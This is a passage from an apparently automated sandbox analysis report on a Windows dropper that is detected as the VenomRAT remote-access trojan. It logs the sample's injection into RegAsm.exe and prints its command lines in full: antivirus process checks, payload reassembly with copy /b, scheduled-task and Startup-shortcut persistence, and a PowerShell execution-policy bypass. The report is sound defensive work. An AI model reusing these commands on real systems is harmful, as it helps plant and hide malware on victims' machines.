                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A3ACJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A410Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A474Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A4D8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A53CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A5A0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A604Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A668Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A6CCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A730Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A794Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A7F8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A85CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A8C0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A924Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A988Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A9ECJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130AA50Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130AAB4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130AB18Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130AB7CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130ABE0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130AC44Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130ACA8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130AD0CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130AD70Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130ADD4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130AE38Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130AE9CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130AF00Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130AF64Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130AFC8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B02CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B090Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B0F4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B158Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B1BCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B220Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B284Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B2E8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B34CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B3B0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B414Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B478Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B4DCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B540Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B5A4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B608Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B66CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B6D0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B734Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B798Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B7FCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B860Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B8C4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B928Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B98CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130B9F0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130BA54Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130BAB8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130BB1CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130BB80Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130BBE4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130BC48Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130BCACJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130BD10Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130BD74Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130BDD8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130BE3CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130BEA0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130BF04Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130BF68Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130BFCCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130C030Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130C094Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130C0F8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130C15CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130C1C0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130C224Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130C288Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130C2ECJump to behavior
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003C1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,27_2_003C1B4D
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_0036338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,27_2_0036338B
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003CBBED SendInput,keybd_event,27_2_003CBBED
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003CEC6C mouse_event,27_2_003CEC6C
                  Source: C:\Users\user\Desktop\ADFoyxP.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.batJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand Go.pub Go.pub.batJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 353090Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Really.pubJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "posted" Good Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.comJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub mJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\353090\Seat.com Seat.com mJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /FJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\curcuma.exe "C:\Users\user\AppData\Local\Temp\curcuma.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\maintains.pub + ..\legislation.pub + ..\blood.pub + ..\document.pub + ..\breaks.pub + ..\both.pub + ..\explicitly.pub + ..\governor.pub + ..\bull.pub + ..\comparison.pub + ..\performing.pub + ..\gate.pub + ..\republican.pub + ..\reverse.pub + ..\thousand.pub + ..\apartments.pub + ..\swingers.pub + ..\urban.pub + ..\robert.pub + ..\regulation.pub + ..\confusion.pub + ..\listening.pub + ..\generating.pub + ..\argentina.pub + ..\amenities.pub + ..\vacation.pub + ..\vampire.pub + ..\trademarks.pub + ..\distinguished.pub + ..\silly.pub + ..\hell.pub + ..\worcester.pub + ..\concept.pub + ..\enlarge.pub + ..\preference.pub + ..\poem.pub m
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & echo url="c:\users\user\appdata\local\tradesecure innovations\tradehub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\maintains.pub + ..\legislation.pub + ..\blood.pub + ..\document.pub + ..\breaks.pub + ..\both.pub + ..\explicitly.pub + ..\governor.pub + ..\bull.pub + ..\comparison.pub + ..\performing.pub + ..\gate.pub + ..\republican.pub + ..\reverse.pub + ..\thousand.pub + ..\apartments.pub + ..\swingers.pub + ..\urban.pub + ..\robert.pub + ..\regulation.pub + ..\confusion.pub + ..\listening.pub + ..\generating.pub + ..\argentina.pub + ..\amenities.pub + ..\vacation.pub + ..\vampire.pub + ..\trademarks.pub + ..\distinguished.pub + ..\silly.pub + ..\hell.pub + ..\worcester.pub + ..\concept.pub + ..\enlarge.pub + ..\preference.pub + ..\poem.pub mJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & echo url="c:\users\user\appdata\local\tradesecure innovations\tradehub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & exitJump to behavior
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003C14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,27_2_003C14AE
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003C1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,27_2_003C1FB0
                  Source: Seat.com, 00000013.00000003.1371153350.00000000045FC000.00000004.00000800.00020000.00000000.sdmp, Seat.com, 00000013.00000000.1359117606.0000000000C93000.00000002.00000001.01000000.00000007.sdmp, TradeHub.com, 0000001B.00000000.1393288924.0000000000423000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: RegAsm.exe, 0000001E.00000002.2523751705.000000000393B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2523751705.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2523751705.000000000359D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: TradeHub.com, RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: ProgMan
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd!SHELLDLL_DefView
                  Source: RegAsm.exe, 0000001E.00000002.2523751705.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2523751705.000000000359D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`,
                  Source: RegAsm.exe, 0000001E.00000002.2523751705.000000000393B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2523751705.000000000359D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_00380A08 cpuid 27_2_00380A08
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003BE5F4 GetLocalTime,27_2_003BE5F4
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_003BE652 GetUserNameW,27_2_003BE652
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 27_2_0039BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,27_2_0039BCD2
                  Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Yara detected VenomRAT
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1300000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.RegAsm.exe.1425afa.0.raw.unpack, type: UNPACKEDPE
